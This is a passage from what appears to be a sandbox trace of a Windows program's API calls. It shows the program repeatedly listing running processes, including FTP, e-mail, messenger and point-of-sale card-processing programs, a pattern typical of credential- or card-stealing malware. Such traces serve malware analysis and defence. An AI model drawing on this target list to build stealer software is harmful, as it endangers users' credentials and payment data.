cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0262.797] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0262.799] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0262.800] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0262.802] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0262.803] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0262.805] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0262.807] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0262.808] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0262.810] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0262.812] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0262.814] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0262.816] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0262.818] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0262.820] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0262.822] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0262.823] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0262.833] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0262.855] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0262.857] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0262.859] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0262.860] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0262.862] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0262.864] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0262.866] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0262.868] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0262.870] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0262.872] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0262.878] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0262.880] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0262.882] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0262.884] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0262.886] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0262.888] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0262.890] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0262.892] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0262.904] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0262.906] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0262.908] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0262.909] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0262.911] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0262.913] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0262.915] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0262.916] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0262.918] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0262.920] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0262.921] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0262.923] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0262.925] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0262.926] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0262.928] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0262.930] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0262.931] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.933] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.935] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0262.936] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.938] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.941] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0262.943] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.944] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0262.946] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.947] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0262.949] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.950] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0262.952] CloseHandle (hObject=0x2338) returned 1 [0262.952] Sleep (dwMilliseconds=0x64) [0262.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0262.966] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.967] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.969] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.971] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.972] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.974] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.975] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.977] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.990] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.991] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.993] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.995] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.996] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.998] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.999] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.001] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.002] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.004] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.005] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.007] Process32Next (in: hSnapshot=0x2338, 